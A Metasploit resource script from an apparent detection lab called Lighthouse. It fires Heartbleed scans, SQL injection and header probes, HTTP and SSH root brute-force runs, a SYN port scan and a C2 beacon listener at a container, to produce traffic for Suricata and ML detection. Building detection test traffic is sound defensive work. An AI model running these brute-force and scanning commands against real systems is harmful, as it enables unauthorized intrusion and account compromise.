# Lighthouse Metasploit attack scripts
# Load inside the container:
#   docker exec -it lh-attacker-msf msfconsole -r /home/msf/attacks.rc
#
# Or run a single module:
#   docker exec -it lh-attacker-msf msfconsole -q -x "use <module>; set RHOSTS 172.28.0.10; run; exit"

<ruby>
  VICTIM = ENV.fetch("VICTIM_IP", "172.28.0.10")
  puts "[*] Lighthouse MSF attack suite  |  target=#{VICTIM}"
</ruby>

# ── Heartbleed (CVE-2014-0160) ───────────────────────────────────
# Generates the TLS heartbeat overflow traffic Suricata will flag.
# NOTE: victim nginx/alpine does NOT have the heartbleed bug —
#       the traffic pattern is what matters for Suricata + ML detection.
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS <%= VICTIM %>
set RPORT 443
set VERBOSE false
set ACTION SCAN
run
back

# ── Web Attack: SQL Injection probe ──────────────────────────────
use auxiliary/scanner/http/http_traversal
set RHOSTS <%= VICTIM %>
set RPORT 80
set PATH /?id=1'
run
back

# ── Web Attack: XSS probe ────────────────────────────────────────
use auxiliary/scanner/http/http_header
set RHOSTS <%= VICTIM %>
set RPORT 80
run
back

# ── Brute Force: HTTP Basic Auth ─────────────────────────────────
use auxiliary/scanner/http/http_login
set RHOSTS <%= VICTIM %>
set RPORT 80
set AUTH_URI /
set USER_FILE /usr/share/metasploit-framework/data/wordlists/http_default_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt
set VERBOSE false
run
back

# ── Brute Force: SSH ─────────────────────────────────────────────
use auxiliary/scanner/ssh/ssh_login
set RHOSTS <%= VICTIM %>
set USERNAME root
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set STOP_ON_SUCCESS false
run
back

# ── Port Scan ────────────────────────────────────────────────────
use auxiliary/scanner/portscan/syn
set RHOSTS <%= VICTIM %>
set PORTS 1-1024
set THREADS 10
run
back

# ── Bot C2 simulation: repeated beaconing ────────────────────────
use auxiliary/server/capture/http
set SRVHOST 0.0.0.0
set SRVPORT 8888
# Just runs the listener briefly to generate outbound beacon traffic
run -j
sleep 5
jobs -k

exit
